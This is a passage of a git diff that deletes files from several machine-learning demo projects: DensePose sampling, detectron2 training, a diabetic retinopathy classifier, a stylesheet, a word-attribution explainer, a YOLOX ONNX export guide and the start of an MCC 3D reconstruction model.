-from typing import Optional, Tuple -import torch -from torch.nn import functional as F - -from detectron2.config import CfgNode -from detectron2.structures import Instances - -from densepose.converters.base import IntTupleBox - -from .densepose_cse_base import DensePoseCSEBaseSampler - - -class DensePoseCSEConfidenceBasedSampler(DensePoseCSEBaseSampler): - """ - Samples DensePose data from DensePose predictions. - Samples for each class are drawn using confidence value estimates. 
- """ - - def __init__( - self, - cfg: CfgNode, - use_gt_categories: bool, - embedder: torch.nn.Module, - confidence_channel: str, - count_per_class: int = 8, - search_count_multiplier: Optional[float] = None, - search_proportion: Optional[float] = None, - ): - """ - Constructor - - Args: - cfg (CfgNode): the config of the model - embedder (torch.nn.Module): necessary to compute mesh vertex embeddings - confidence_channel (str): confidence channel to use for sampling; - possible values: - "coarse_segm_confidence": confidences for coarse segmentation - (default: "coarse_segm_confidence") - count_per_class (int): the sampler produces at most `count_per_class` - samples for each category (default: 8) - search_count_multiplier (float or None): if not None, the total number - of the most confident estimates of a given class to consider is - defined as `min(search_count_multiplier * count_per_class, N)`, - where `N` is the total number of estimates of the class; cannot be - specified together with `search_proportion` (default: None) - search_proportion (float or None): if not None, the total number of the - of the most confident estimates of a given class to consider is - defined as `min(max(search_proportion * N, count_per_class), N)`, - where `N` is the total number of estimates of the class; cannot be - specified together with `search_count_multiplier` (default: None) - """ - super().__init__(cfg, use_gt_categories, embedder, count_per_class) - self.confidence_channel = confidence_channel - self.search_count_multiplier = search_count_multiplier - self.search_proportion = search_proportion - assert (search_count_multiplier is None) or (search_proportion is None), ( - f"Cannot specify both search_count_multiplier (={search_count_multiplier})" - f"and search_proportion (={search_proportion})" - ) - - def _produce_index_sample(self, values: torch.Tensor, count: int): - """ - Produce a sample of indices to select data based on confidences - - Args: - values (torch.Tensor): a tensor of length k that contains confidences - k: number of points labeled with part_id - count (int): number of samples to produce, should be positive and <= k - - Return: - list(int): indices of values (along axis 1) selected as a sample - """ - k = values.shape[1] - if k == count: - index_sample = list(range(k)) - else: - # take the best count * search_count_multiplier pixels, - # sample from them uniformly - # (here best = smallest variance) - _, sorted_confidence_indices = torch.sort(values[0]) - if self.search_count_multiplier is not None: - search_count = min(int(count * self.search_count_multiplier), k) - elif self.search_proportion is not None: - search_count = min(max(int(k * self.search_proportion), count), k) - else: - search_count = min(count, k) - sample_from_top = random.sample(range(search_count), count) - index_sample = sorted_confidence_indices[-search_count:][sample_from_top] - return index_sample - - def _produce_mask_and_results( - self, instance: Instances, bbox_xywh: IntTupleBox - ) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]: - """ - Method to get labels and DensePose results from an instance - - Args: - instance (Instances): an instance of - `DensePoseEmbeddingPredictorOutputWithConfidences` - bbox_xywh (IntTupleBox): the corresponding bounding box - - Return: - mask (torch.Tensor): shape [H, W], DensePose segmentation mask - embeddings (Tuple[torch.Tensor]): a tensor of shape [D, H, W] - DensePose CSE Embeddings - other_values: a tensor of shape [1, H, W], DensePose CSE confidence - """ - _, _, 
w, h = bbox_xywh - densepose_output = instance.pred_densepose - mask, embeddings, _ = super()._produce_mask_and_results(instance, bbox_xywh) - other_values = F.interpolate( - getattr(densepose_output, self.confidence_channel), - size=(h, w), - mode="bilinear", - )[0].cpu() - return mask, embeddings, other_values diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py deleted file mode 100644 index 222dfddffb1f9bedf87f4c345534045b29e2d8ee..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py +++ /dev/null @@ -1,19 +0,0 @@ -from detectron2.model_zoo import get_config -from torch import nn - -model = get_config("common/models/retinanet.py").model -model.backbone.bottom_up.freeze_at = 2 - -# The head will overwrite string "SyncBN" to use domain-specific BN, so we -# provide a class here to use shared BN in training. -model.head.norm = nn.SyncBatchNorm2d - -dataloader = get_config("common/data/coco.py").dataloader -lr_multiplier = get_config("common/coco_schedule.py").lr_multiplier_3x -optimizer = get_config("common/optim.py").SGD -train = get_config("common/train.py").train - -optimizer.lr = 0.01 - -train.init_checkpoint = "detectron2://ImageNetPretrained/MSRA/R-50.pkl" -train.max_iter = 270000 # 3x for batchsize = 16 diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py deleted file mode 100644 index be4588e559816727635ce287281df3d41514a8cc..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py +++ /dev/null @@ -1,217 +0,0 @@ -#!/usr/bin/env python -# Copyright (c) Facebook, Inc. and its affiliates. -""" -Detectron2 training script with a plain training loop. - -This script reads a given config file and runs the training or evaluation. -It is an entry point that is able to train standard models in detectron2. - -In order to let one script support training of many models, -this script contains logic that are specific to these built-in models and therefore -may not be suitable for your own project. -For example, your research project perhaps only needs a single "evaluator". - -Therefore, we recommend you to use detectron2 as a library and take -this file as an example of how to use the library. -You may want to write your own script with your datasets and other customizations. - -Compared to "train_net.py", this script supports fewer default features. -It also includes fewer abstraction, therefore is easier to add custom logic. 
-""" - -import logging -import os -from collections import OrderedDict -import torch -from torch.nn.parallel import DistributedDataParallel - -import detectron2.utils.comm as comm -from detectron2.checkpoint import DetectionCheckpointer, PeriodicCheckpointer -from detectron2.config import get_cfg -from detectron2.data import ( - MetadataCatalog, - build_detection_test_loader, - build_detection_train_loader, -) -from detectron2.engine import default_argument_parser, default_setup, default_writers, launch -from detectron2.evaluation import ( - CityscapesInstanceEvaluator, - CityscapesSemSegEvaluator, - COCOEvaluator, - COCOPanopticEvaluator, - DatasetEvaluators, - LVISEvaluator, - PascalVOCDetectionEvaluator, - SemSegEvaluator, - inference_on_dataset, - print_csv_format, -) -from detectron2.modeling import build_model -from detectron2.solver import build_lr_scheduler, build_optimizer -from detectron2.utils.events import EventStorage - -logger = logging.getLogger("detectron2") - - -def get_evaluator(cfg, dataset_name, output_folder=None): - """ - Create evaluator(s) for a given dataset. - This uses the special metadata "evaluator_type" associated with each builtin dataset. - For your own dataset, you can simply create an evaluator manually in your - script and do not have to worry about the hacky if-else logic here. - """ - if output_folder is None: - output_folder = os.path.join(cfg.OUTPUT_DIR, "inference") - evaluator_list = [] - evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type - if evaluator_type in ["sem_seg", "coco_panoptic_seg"]: - evaluator_list.append( - SemSegEvaluator( - dataset_name, - distributed=True, - output_dir=output_folder, - ) - ) - if evaluator_type in ["coco", "coco_panoptic_seg"]: - evaluator_list.append(COCOEvaluator(dataset_name, output_dir=output_folder)) - if evaluator_type == "coco_panoptic_seg": - evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder)) - if evaluator_type == "cityscapes_instance": - return CityscapesInstanceEvaluator(dataset_name) - if evaluator_type == "cityscapes_sem_seg": - return CityscapesSemSegEvaluator(dataset_name) - if evaluator_type == "pascal_voc": - return PascalVOCDetectionEvaluator(dataset_name) - if evaluator_type == "lvis": - return LVISEvaluator(dataset_name, cfg, True, output_folder) - if len(evaluator_list) == 0: - raise NotImplementedError( - "no Evaluator for the dataset {} with the type {}".format(dataset_name, evaluator_type) - ) - if len(evaluator_list) == 1: - return evaluator_list[0] - return DatasetEvaluators(evaluator_list) - - -def do_test(cfg, model): - results = OrderedDict() - for dataset_name in cfg.DATASETS.TEST: - data_loader = build_detection_test_loader(cfg, dataset_name) - evaluator = get_evaluator( - cfg, dataset_name, os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name) - ) - results_i = inference_on_dataset(model, data_loader, evaluator) - results[dataset_name] = results_i - if comm.is_main_process(): - logger.info("Evaluation results for {} in csv format:".format(dataset_name)) - print_csv_format(results_i) - if len(results) == 1: - results = list(results.values())[0] - return results - - -def do_train(cfg, model, resume=False): - model.train() - optimizer = build_optimizer(cfg, model) - scheduler = build_lr_scheduler(cfg, optimizer) - - checkpointer = DetectionCheckpointer( - model, cfg.OUTPUT_DIR, optimizer=optimizer, scheduler=scheduler - ) - start_iter = ( - checkpointer.resume_or_load(cfg.MODEL.WEIGHTS, resume=resume).get("iteration", -1) + 1 - ) - max_iter = 
cfg.SOLVER.MAX_ITER - - periodic_checkpointer = PeriodicCheckpointer( - checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD, max_iter=max_iter - ) - - writers = default_writers(cfg.OUTPUT_DIR, max_iter) if comm.is_main_process() else [] - - # compared to "train_net.py", we do not support accurate timing and - # precise BN here, because they are not trivial to implement in a small training loop - data_loader = build_detection_train_loader(cfg) - logger.info("Starting training from iteration {}".format(start_iter)) - with EventStorage(start_iter) as storage: - for data, iteration in zip(data_loader, range(start_iter, max_iter)): - storage.iter = iteration - - loss_dict = model(data) - losses = sum(loss_dict.values()) - assert torch.isfinite(losses).all(), loss_dict - - loss_dict_reduced = {k: v.item() for k, v in comm.reduce_dict(loss_dict).items()} - losses_reduced = sum(loss for loss in loss_dict_reduced.values()) - if comm.is_main_process(): - storage.put_scalars(total_loss=losses_reduced, **loss_dict_reduced) - - optimizer.zero_grad() - losses.backward() - optimizer.step() - storage.put_scalar("lr", optimizer.param_groups[0]["lr"], smoothing_hint=False) - scheduler.step() - - if ( - cfg.TEST.EVAL_PERIOD > 0 - and (iteration + 1) % cfg.TEST.EVAL_PERIOD == 0 - and iteration != max_iter - 1 - ): - do_test(cfg, model) - # Compared to "train_net.py", the test results are not dumped to EventStorage - comm.synchronize() - - if iteration - start_iter > 5 and ( - (iteration + 1) % 20 == 0 or iteration == max_iter - 1 - ): - for writer in writers: - writer.write() - periodic_checkpointer.step(iteration) - - -def setup(args): - """ - Create configs and perform basic setups. - """ - cfg = get_cfg() - cfg.merge_from_file(args.config_file) - cfg.merge_from_list(args.opts) - cfg.freeze() - default_setup( - cfg, args - ) # if you don't like any of the default setup, write your own setup code - return cfg - - -def main(args): - cfg = setup(args) - - model = build_model(cfg) - logger.info("Model:\n{}".format(model)) - if args.eval_only: - DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load( - cfg.MODEL.WEIGHTS, resume=args.resume - ) - return do_test(cfg, model) - - distributed = comm.get_world_size() > 1 - if distributed: - model = DistributedDataParallel( - model, device_ids=[comm.get_local_rank()], broadcast_buffers=False - ) - - do_train(cfg, model, resume=args.resume) - return do_test(cfg, model) - - -if __name__ == "__main__": - args = default_argument_parser().parse_args() - print("Command Line Args:", args) - launch( - main, - args.num_gpus, - num_machines=args.num_machines, - machine_rank=args.machine_rank, - dist_url=args.dist_url, - args=(args,), - ) diff --git a/spaces/ccaglieri/convnext_diabetic/app.py b/spaces/ccaglieri/convnext_diabetic/app.py deleted file mode 100644 index 08c7c06845b226f3349c40587b7a818699a6417e..0000000000000000000000000000000000000000 --- a/spaces/ccaglieri/convnext_diabetic/app.py +++ /dev/null @@ -1,136 +0,0 @@ -import torch -import cv2 -import torch.nn as nn -import numpy as np -from torchvision import models, transforms -import time -import os -import copy -import pickle -from PIL import Image -import datetime -import gdown -import zipfile -import urllib.request -from pytorch_grad_cam import GradCAMPlusPlus -from pytorch_grad_cam.utils.image import show_cam_on_image, preprocess_image -import gradio as gr - -IMG_SIZE = 512 -CLASSES = [ "No DR", "Mild", "Moderate", "Severe", "Proliferative DR" ] - -checkpoint = "./demo_checkpoint_convnext.pth" - -device = 
"cpu" -if torch.cuda.is_available(): - device = "cuda" - -model = torch.load(checkpoint, device) - -global_transforms = transforms.Compose([ - transforms.ToPILImage(), - transforms.Lambda(lambda image: image.convert('RGB')), - transforms.Resize(IMG_SIZE), - transforms.ToTensor(), - transforms.Normalize([0.2786802, 0.2786802, 0.2786802], [0.16637428, 0.16637428, 0.16637428]) - ]) - -def crop_image_from_gray(img,tol=7): - mask = img>tol - - img1=img[np.ix_(mask.any(1),mask.any(0))] - img2=img[np.ix_(mask.any(1),mask.any(0))] - img3=img[np.ix_(mask.any(1),mask.any(0))] - img = np.stack([img1,img2,img3],axis=-1) - - return img - -def circle_crop(img): - height, width = img.shape - - x = int(width/2) - y = int(height/2) - r = np.amin((x,y)) - - circle_img = np.zeros((height, width), np.uint8) - cv2.circle(circle_img, (x,y), int(r), 1, thickness=-1) - img = cv2.bitwise_and(img, img, mask=circle_img) - img = crop_image_from_gray(img) - return img - -def preprocess(img): - # Extract Green Channel - img = img[:,:,1] - #CLAHE - clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - img = clahe.apply(img) - # Circle crop - img = circle_crop(img) - # Resize - img = cv2.resize(img, (IMG_SIZE,IMG_SIZE)) - - return img - -def grad_campp(img): - img = np.float32(img) / 255 - input_tensor = preprocess_image(img, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]).to(device) - - # Set target layers - target_layers = [model.features[-1]] - - # GradCAM++ - gradcampp = GradCAMPlusPlus(model=model, target_layers=target_layers) - - grayscale_gradcampp = gradcampp(input_tensor=input_tensor, targets=None , eigen_smooth=False, aug_smooth=False) - - grayscale_gradcampp = grayscale_gradcampp[0, :] - - gradcampp_image = show_cam_on_image(img, grayscale_gradcampp) - - return gradcampp_image - -def do_inference(img): - img = preprocess(img) - img_t = global_transforms(img) - batch_t = torch.unsqueeze(img_t, 0) - model.eval() - gradcam_img = grad_campp(img) - # We don't need gradients for test, so wrap in - # no_grad to save memory - with torch.no_grad(): - batch_t = batch_t.to(device) - # forward propagation - output = model( batch_t) - # get prediction - probs = torch.nn.functional.softmax(output, dim=1) - output = torch.argsort(probs, dim=1, descending=True).cpu().numpy()[0].astype(int) - probs = probs.cpu().numpy()[0] - probs = probs[output] - labels = np.array(CLASSES)[output] - return {labels[i]: round(float(probs[i]),2) for i in range(len(labels))}, gradcam_img - -im = gr.inputs.Image(shape=(512, 512), image_mode='RGB', - invert_colors=False, source="upload", - type="numpy") -title = "ConvNeXt for Diabetic Retinopathy Detection" -description = "" -examples = [['./examples/0_0.jpeg'],['./examples/0_1.png'], - ['./examples/1_0.jpeg'],['./examples/1_1.png'], - ['./examples/2_0.jpeg'],['./examples/2_1.png'], - ['./examples/3_0.jpeg'],['./examples/3_1.png'], - ['./examples/4_0.jpeg'],['./examples/4_1.png']] -#article="

Colab Recipes for Computer Vision - Dr. Mohamed Elawady

" -iface = gr.Interface( - do_inference, - im, - outputs = [ gr.outputs.Label(num_top_classes=5), gr.outputs.Image(label='Output image', type='pil')], - live=False, - interpretation=None, - title=title, - description=description, - examples=examples -) - -#iface.test_launch() - -iface.launch() \ No newline at end of file diff --git a/spaces/celise88/Pathfinder/static/styles.css b/spaces/celise88/Pathfinder/static/styles.css deleted file mode 100644 index e6948baf02c014460f1dcc298a40a6e3da3d99ba..0000000000000000000000000000000000000000 --- a/spaces/celise88/Pathfinder/static/styles.css +++ /dev/null @@ -1,284 +0,0 @@ -html { - font-family: Lato, sans-serif; -} - -*, *::after, *::before { - box-sizing: inherit; -} - -.body { - box-sizing: border-box; - margin: 0; -} - -.navbar { - max-width: 1000px; - margin: 50px auto; - padding: 0 20px; - display: flex; - flex-direction: row; - justify-content: space-between; - font-size: 20px; -} - -.navbar__brand { - display: flex; - align-items: center; - color: #2c2161; -} - -.navbar__logo { - text-decoration: none; - color: #2c2161; -} - -.navbar__navigation { - display: flex; - flex-direction: row; - list-style: none; - padding: 0; - align-items: center; - color: #5c6b70 -} - -.navbar__navigation-item { - margin-left: 30px; -} - -.navbar__link { - color: inherit; - text-decoration: none; -} - -.main { - max-width: 600px; - margin: 0 auto; - padding: 0 20px; -} - -.pagetitle { - font-size: 39px; - font-weight: bold; - margin-bottom: 20px; - margin-top: 50px; - background-color: #3cd0ff; - border: none; - border-radius: 20px; - padding: 5px; - color: white; - text-align:center; -} - -.pagesubtitle { - font-size: 30px; - font-weight: bold; - margin-bottom: 75px; - margin-top: 75px; - color: #2c2161; - text-align:center -} - -.form__input { - display: flex; - flex-direction: column; - margin-top: 50px; - align-items: flex-start; -} - -.form__label { - display: flex; - margin-bottom: 30px; - font-size: 16px; - font-weight: bold; - color: #2c2161; - text-align:center; -} - -.form__dropdown { - display: block; - max-height: fit-content; - margin-bottom: 10px; - font-size: 14px; - align-self: center; - text-align:center; -} - -.form__submit { - background-color: #3cd0ff; - border: none; - max-width: fit-content; - font-size: 16px; - font-weight: bold; - padding: 5px 30px; - border-radius: 20px; - color: white; - cursor: pointer; - text-align:center; - } - -.radio__submit { - margin: auto; - background-color: #3cd0ff; - border: none; - max-width: fit-content; - font-size: 16px; - font-weight: bold; - padding: 5px 30px; - border-radius: 20px; - color: white; - cursor: pointer; - } - -.upload { - max-width: fit-content; - display: flex; - flex-direction: column; - - margin-bottom: 50px; -} - -.upload__file { - font-size: 14px; - text-align:center; - margin-top: 50px; - margin-bottom: 20px; - color: #2c2161; - cursor: pointer; -} - -.sectiontitle { - font-size: 24px; - font-weight: bold; - margin-bottom: 20px; - margin-top: 70px; - color: #2c2161; -} - -.sectiontext { - font-size: 18px; - color: #2c2161; - margin-bottom: 50px; -} - -.message { - font-size: 24px; - font-weight: bold; - margin-bottom: 200px; - margin-top: 200px; - margin-left: 50px; - color: #2c2161; -} - -.alert { - font-size: 14px; - color: #2c2161; - margin-bottom: 30px; - text-align:left; -} - -.sectionlist { - margin-bottom: 30px; -} - -.sectionlist__item { - font-size: 16px; - color: #2c2161; - margin-bottom: 10px; -} - -.output__section { - display: flex; - flex-direction: column; - 
justify-content: center; - align-items: center; - margin-bottom: 50px; -} - -.output__subtitle { - font-size: 30px; - font-weight: bold; - margin-bottom: 30px; - color: #2c2161; - text-align:center -} - -.output__list { - text-align: center; - margin-bottom: 50px; -} - -.output__list-item { - font-size: 14px; - color: #2c2161; - margin-bottom: 10px; - margin-right: 10px; -} - -.output__list-coloreditem { - font-size: 14px; - color: #3cd0ff; - margin-bottom: 10px; - margin-right: 10px; - font-weight: bold; -} - -.selection__form { - display: table-row-group; - vertical-align: left; - align-content: left; -} - -.form__login { - display: flex; - flex-direction: column; - justify-content: center; - align-items: center; -} - -.form__login-label { - font-size: 14px; - color: #2c2161; - text-align: center; -} - -.output__table-item { - font-size: 14px; - color: #2c2161; - text-align: left; - align-self: flex-start; -} - -.footer { - background-color: #323f43; - padding: 40px 0; - border-top: 4px solid black; - display: flex; - flex-direction: row; - justify-content: space-between; -} - -.footer__text { - display: flex; - flex-direction: row; - list-style: none; - padding: 0; - color: white; - font-size: 12px; -} - -.footer__text-item { - margin-left: 50px; - color: inherit; - text-decoration: none; - font-size: inherit; -} - -.footer__text-link { - color: inherit; - font-size: inherit; -} - -.footer__text-link:hover { - text-decoration: underline; - color: inherit; -} \ No newline at end of file diff --git a/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py b/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py deleted file mode 100644 index d26385ce27b8a30111b0ae44101e8eb1201e7f39..0000000000000000000000000000000000000000 --- a/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py +++ /dev/null @@ -1,148 +0,0 @@ -# ########################################################################### -# -# CLOUDERA APPLIED MACHINE LEARNING PROTOTYPE (AMP) -# (C) Cloudera, Inc. 2022 -# All rights reserved. -# -# Applicable Open Source License: Apache 2.0 -# -# NOTE: Cloudera open source products are modular software products -# made up of hundreds of individual components, each of which was -# individually copyrighted. Each Cloudera open source product is a -# collective work under U.S. Copyright Law. Your license to use the -# collective work is as provided in your written agreement with -# Cloudera. Used apart from the collective work, this file is -# licensed for your use pursuant to the open source license -# identified above. -# -# This code is provided to you pursuant a written agreement with -# (i) Cloudera, Inc. or (ii) a third-party authorized to distribute -# this code. If you do not have a written agreement with Cloudera nor -# with an authorized and properly licensed third party, you do not -# have any rights to access nor to use this code. -# -# Absent a written agreement with Cloudera, Inc. 
(“Cloudera”) to the -# contrary, A) CLOUDERA PROVIDES THIS CODE TO YOU WITHOUT WARRANTIES OF ANY -# KIND; (B) CLOUDERA DISCLAIMS ANY AND ALL EXPRESS AND IMPLIED -# WARRANTIES WITH RESPECT TO THIS CODE, INCLUDING BUT NOT LIMITED TO -# IMPLIED WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY AND -# FITNESS FOR A PARTICULAR PURPOSE; (C) CLOUDERA IS NOT LIABLE TO YOU, -# AND WILL NOT DEFEND, INDEMNIFY, NOR HOLD YOU HARMLESS FOR ANY CLAIMS -# ARISING FROM OR RELATED TO THE CODE; AND (D)WITH RESPECT TO YOUR EXERCISE -# OF ANY RIGHTS GRANTED TO YOU FOR THE CODE, CLOUDERA IS NOT LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, PUNITIVE OR -# CONSEQUENTIAL DAMAGES INCLUDING, BUT NOT LIMITED TO, DAMAGES -# RELATED TO LOST REVENUE, LOST PROFITS, LOSS OF INCOME, LOSS OF -# BUSINESS ADVANTAGE OR UNAVAILABILITY, OR LOSS OR CORRUPTION OF -# DATA. -# -# ########################################################################### - -import torch -from transformers_interpret import SequenceClassificationExplainer -from transformers import ( - AutoTokenizer, - AutoModelForSequenceClassification, -) - -from apps.visualization_utils import visualize_text - -class CustomSequenceClassificationExplainer(SequenceClassificationExplainer): - """ - Subclassing to replace `visualize()` method with custom styling. - - Namely, removing a few columns, styling fonts, and re-arrangning legend position. - """ - - def visualize(self, html_filepath: str = None, true_class: str = None): - """ - Visualizes word attributions. If in a notebook table will be displayed inline. - Otherwise pass a valid path to `html_filepath` and the visualization will be saved - as a html file. - If the true class is known for the text that can be passed to `true_class` - """ - tokens = [token.replace("Ġ", "") for token in self.decode(self.input_ids)] - attr_class = self.id2label[self.selected_index] - - if self._single_node_output: - if true_class is None: - true_class = round(float(self.pred_probs)) - predicted_class = round(float(self.pred_probs)) - attr_class = round(float(self.pred_probs)) - else: - if true_class is None: - true_class = self.selected_index - predicted_class = self.predicted_class_name - - score_viz = self.attributions.visualize_attributions( # type: ignore - self.pred_probs, - predicted_class, - true_class, - attr_class, - tokens, - ) - - # NOTE: here is the overwritten function - html = visualize_text([score_viz]) - - if html_filepath: - if not html_filepath.endswith(".html"): - html_filepath = html_filepath + ".html" - with open(html_filepath, "w") as html_file: - html_file.write(html.data) - - return html - - -class InterpretTransformer: - """ - Utility for visualizing word attribution scores from Transformer models. - - This class utilizes the [Transformers Interpret](https://github.com/cdpierse/transformers-interpret) - libary to calculate word attributions using a techinique called Integrated Gradients. - - Attributes: - cls_model_identifier (str) - - """ - - def __init__(self, cls_model_identifier: str): - - self.cls_model_identifier = cls_model_identifier - self.device = ( - torch.cuda.current_device() if torch.cuda.is_available() else "cpu" - ) - - self._initialize_hf_artifacts() - - def _initialize_hf_artifacts(self): - """ - Initialize a HuggingFace artifacts (tokenizer and model) according - to the provided identifiers for both SBert and the classification model. - Then initialize the word attribution explainer with the HF model+tokenizer. 
- - """ - - # classifer - self.cls_tokenizer = AutoTokenizer.from_pretrained(self.cls_model_identifier) - self.cls_model = AutoModelForSequenceClassification.from_pretrained( - self.cls_model_identifier - ) - self.cls_model.to(self.device) - - # transformers interpret - self.explainer = CustomSequenceClassificationExplainer( - self.cls_model, self.cls_tokenizer - ) - - def visualize_feature_attribution_scores(self, text: str, class_index: int = 0): - """ - Calculates and visualizes feature attributions using integrated gradients. - - Args: - text (str) - text to get attributions for - class_index (int) - Optional output index to provide attributions for - - """ - self.explainer(text, index=class_index) - return self.explainer.visualize() diff --git a/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md b/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md deleted file mode 100644 index 6af0944a6b3a984045daf2d4215f96290ed5e9af..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md +++ /dev/null @@ -1,78 +0,0 @@ -## YOLOX-ONNXRuntime in Python - -This doc introduces how to convert your pytorch model into onnx, and how to run an onnxruntime demo to verify your convertion. - -### Step1: Install onnxruntime - -run the following command to install onnxruntime: -```shell -pip install onnxruntime -``` - -### Step2: Get ONNX models - -Users might download our pre-generated ONNX models or convert their own models to ONNX. - -#### Download ONNX models. - -| Model | Parameters | GFLOPs | Test Size | mAP | Weights | -|:------| :----: | :----: | :---: | :---: | :---: | -| YOLOX-Nano | 0.91M | 1.08 | 416x416 | 25.8 |[github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_nano.onnx) | -| YOLOX-Tiny | 5.06M | 6.45 | 416x416 |32.8 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_tiny.onnx) | -| YOLOX-S | 9.0M | 26.8 | 640x640 |40.5 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_s.onnx) | -| YOLOX-M | 25.3M | 73.8 | 640x640 |47.2 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_m.onnx) | -| YOLOX-L | 54.2M | 155.6 | 640x640 |50.1 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_l.onnx) | -| YOLOX-Darknet53| 63.72M | 185.3 | 640x640 |48.0 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_darknet.onnx) | -| YOLOX-X | 99.1M | 281.9 | 640x640 |51.5 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_x.onnx) | - -#### Convert Your Model to ONNX - -First, you should move to by: -```shell -cd -``` -Then, you can: - -1. Convert a standard YOLOX model by -n: -```shell -python3 tools/export_onnx.py --output-name yolox_s.onnx -n yolox-s -c yolox_s.pth -``` -Notes: -* -n: specify a model name. The model name must be one of the [yolox-s,m,l,x and yolox-nano, yolox-tiny, yolov3] -* -c: the model you have trained -* -o: opset version, default 11. **However, if you will further convert your onnx model to [OpenVINO](https://github.com/Megvii-BaseDetection/YOLOX/demo/OpenVINO/), please specify the opset version to 10.** -* --no-onnxsim: disable onnxsim -* To customize an input shape for onnx model, modify the following code in tools/export.py: - - ```python - dummy_input = torch.randn(1, 3, exp.test_size[0], exp.test_size[1]) - ``` - -1. 
Convert a standard YOLOX model by -f. When using -f, the above command is equivalent to: - -```shell -python3 tools/export_onnx.py --output-name yolox_s.onnx -f exps/default/yolox_s.py -c yolox_s.pth -``` - -3. To convert your customized model, please use -f: - -```shell -python3 tools/export_onnx.py --output-name your_yolox.onnx -f exps/your_dir/your_yolox.py -c your_yolox.pth -``` - -### Step3: ONNXRuntime Demo - -Step1. -```shell -cd /demo/ONNXRuntime -``` - -Step2. -```shell -python3 onnx_inference.py -m -i -o -s 0.3 --input_shape 640,640 -``` -Notes: -* -m: your converted onnx model -* -i: input_image -* -s: score threshold for visualization. -* --input_shape: should be consistent with the shape you used for onnx convertion. diff --git a/spaces/chongjie/MCC_slim/mcc_model.py b/spaces/chongjie/MCC_slim/mcc_model.py deleted file mode 100644 index 9980a8c941042062208ca7ea0175601acd72a3ae..0000000000000000000000000000000000000000 --- a/spaces/chongjie/MCC_slim/mcc_model.py +++ /dev/null @@ -1,386 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. -# -------------------------------------------------------- -# References: -# timm: https://github.com/rwightman/pytorch-image-models/tree/master/timm -# DeiT: https://github.com/facebookresearch/deit -# MAE: https://github.com/facebookresearch/mae -# -------------------------------------------------------- - -from functools import partial - -import torch -import torch.nn as nn -import torch.nn.functional as F - -from timm.models.vision_transformer import PatchEmbed, Block, Mlp, DropPath - -from util.pos_embed import get_2d_sincos_pos_embed - -class MCCDecoderAttention(nn.Module): - def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0., args=None): - super().__init__() - assert dim % num_heads == 0, 'dim should be divisible by num_heads' - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = head_dim ** -0.5 - - self.args = args - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - def forward(self, x, unseen_size): - B, N, C = x.shape - qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4) - q, k, v = qkv.unbind(0) - attn = (q @ k.transpose(-2, -1)) * self.scale - - mask = torch.zeros((1, 1, N, N), device=attn.device) - mask[:, :, :, -unseen_size:] = float('-inf') - for i in range(unseen_size): - mask[:, :, -(i + 1), -(i + 1)] = 0 - attn = attn + mask - attn = attn.softmax(dim=-1) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - -class MCCDecoderBlock(nn.Module): - - def __init__( - self, dim, num_heads, mlp_ratio=4., qkv_bias=False, drop=0., attn_drop=0., init_values=None, - drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm, args=None): - super().__init__() - self.args = args - self.norm1 = norm_layer(dim) - self.attn = MCCDecoderAttention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop, args=args) - self.ls1 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity() - self.drop_path1 = DropPath(drop_path) if drop_path > 0. 
